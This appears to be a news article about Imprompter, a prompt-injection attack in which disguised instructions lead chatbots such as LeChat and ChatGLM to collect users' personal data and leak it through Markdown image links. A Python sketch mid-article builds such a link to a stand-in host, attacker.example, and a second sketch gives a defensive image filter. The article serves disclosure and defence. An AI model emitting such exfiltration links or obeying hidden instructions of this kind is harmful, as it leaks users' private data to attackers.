A team of researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore has developed a new method of attacking large language models (LLMs) that lets attackers collect sensitive user data such as names, identification numbers, credit card details, and addresses. The method, dubbed Imprompter, is an algorithm that disguises malicious instructions inside the prompts fed to the language model.

Xiaohan Fu, the lead author of the study and a PhD student in computer science at UCSD, explained that the method works by injecting disguised instructions that at first glance look like a random string of characters. The language model, however, interprets them as commands to find and collect personal information. Attackers can use these concealed instructions to extract names, email addresses, payment details, and other confidential data, and then send it to a server they control. The entire operation goes unnoticed by the user.

The researchers tested the attack on two popular chatbots: *LeChat* from the French company Mistral AI and the Chinese chatbot *ChatGLM*. In both cases the attack proved highly effective, extracting personal data in 80% of the test conversations. In response, Mistral AI announced that it had already patched the vulnerability by disabling one of the chat features used in the attack. The developers of ChatGLM, meanwhile, emphasized their commitment to security but declined to comment directly on the vulnerability.



In the Imprompter attack, the hidden command instructs the model to search the conversation for personal data and then format that data as a Markdown image link. The personal data is appended to a URL controlled by the attackers, so when the chat interface tries to load the image, the data is sent to their server. The user notices nothing, because all that appears in the chat is a transparent 1×1-pixel image.
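To make the exfiltration step concrete, here is a minimal Python sketch. It assumes the data travels in the query string of a hypothetical endpoint, `attacker.example/pixel.png`; the URL layout actually used in the study may differ, and the function names `build_image_markdown` and `read_server_log_entry` are illustrative only. The point it shows is that the attacker needs no code running in the chat at all: once the client fetches the "image", the data is already inside the request URL.

```python
from urllib.parse import parse_qs, urlencode, urlparse

# Hypothetical attacker endpoint; "attacker.example" is a reserved placeholder domain.
ATTACKER_URL = "https://attacker.example/pixel.png"


def build_image_markdown(pii: dict[str, str]) -> str:
    """Pack extracted fields into the query string of a Markdown image link."""
    query = urlencode(pii)  # URL-encodes values: spaces become "+", "@" becomes "%40"
    return f"![]({ATTACKER_URL}?{query})"


def read_server_log_entry(url: str) -> dict[str, str]:
    """Recover the fields the way an attacker's server log would expose them."""
    params = parse_qs(urlparse(url).query)
    return {key: values[0] for key, values in params.items()}


# What the model might emit after finding personal data in the conversation.
md = build_image_markdown({"name": "Jane Doe", "email": "jane@example.com"})
print(md)  # ![](https://attacker.example/pixel.png?name=Jane+Doe&email=jane%40example.com)

# When the chat client fetches the "image", the full URL reaches the server.
url = md[md.index("(") + 1 : -1]
print(read_server_log_entry(url))  # {'name': 'Jane Doe', 'email': 'jane@example.com'}
```

Because the alt text is empty and the server can answer with a transparent pixel, nothing visible tips off the user.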

Professor Earlence Fernandes of UCSD described the method as highly sophisticated, noting that the disguised command must simultaneously locate personal information, generate a working URL, apply Markdown syntax, and do all of this covertly. Fernandes likened the attack to malware because it performs unauthorized functions without the user noticing. He also pointed out that such operations would normally require a substantial amount of code, as in traditional malware, whereas here everything is hidden in a short, seemingly meaningless prompt.

Representatives of Mistral AI said they welcome researchers' help in improving the security of their products. After being notified of the vulnerability, the company promptly made the necessary changes and classified the issue as medium severity. Mistral AI has blocked the use of Markdown syntax to load external images via URL, closing the loophole the attack relied on.
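A filter in the spirit of this fix might look like the Python sketch below. It is not Mistral AI's implementation; it assumes a hypothetical allowlist, `ALLOWED_IMAGE_HOSTS`, of image hosts the chat front end trusts, and replaces every inline Markdown image pointing anywhere else with a text placeholder before the response is rendered, so the browser never issues the request that would leak the data.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: the only hosts the chat front end may load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.chat.example"}

# Inline Markdown images: ![alt](url) or ![alt](url "title").
# Group 1 is the alt text, group 2 the URL (up to whitespace or ")").
IMAGE_PATTERN = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)[^)]*\)')


def strip_external_images(markdown: str) -> str:
    """Replace images whose host is not allowlisted (including relative URLs)."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""  # hostname is lowercased; None if absent
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted image: keep it unchanged
        return f"[image removed: {alt}]" if alt else "[image removed]"

    return IMAGE_PATTERN.sub(replace, markdown)


print(strip_external_images("Hi ![](https://attacker.example/p.png?x=1) bye"))
# Hi [image removed] bye
```

The regular expression only covers inline `![alt](url)` images; reference-style images, raw HTML `<img>` tags, and URLs containing parentheses would need separate handling, which is arguably a reason to enforce such a policy in the Markdown renderer itself rather than with a regex.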

Fernandes believes this is one of the first cases in which a specific prompt-based attack has led to a vulnerability being fixed in an LLM-based product. However, he cautioned that in the long run, restricting the capabilities of language models may prove “counterproductive”, since it reduces their functionality.

For their part, the developers of ChatGLM reiterated that they have always prioritized the security of their models and continue to work closely with the open-source community to strengthen protection. They maintained that their model is secure and that user privacy remains a top priority.

The Imprompter study also marks a significant advance in methods of attacking language models. Dan McInerney, a lead threat researcher at Protect AI, emphasized that Imprompter is an algorithm for automatically generating prompts that can be used in attacks such as stealing personal data, causing images to be misclassified, or carrying out other malicious actions. While some aspects of the attack resemble previously known methods, the new algorithm ties them together into a cohesive whole, making the attack more effective.

As language models grow more popular and become more deeply embedded in everyday life, the risk of such attacks grows as well. McInerney noted that deploying AI agents that accept arbitrary user input should be regarded as a high-risk activity that requires thorough testing beforehand. Companies must carefully assess how their models interact with data and consider how they might be misused.

For everyday users, this means being mindful of the information they share with chatbots and other AI systems, and being cautious about using prompts from others, particularly those found online.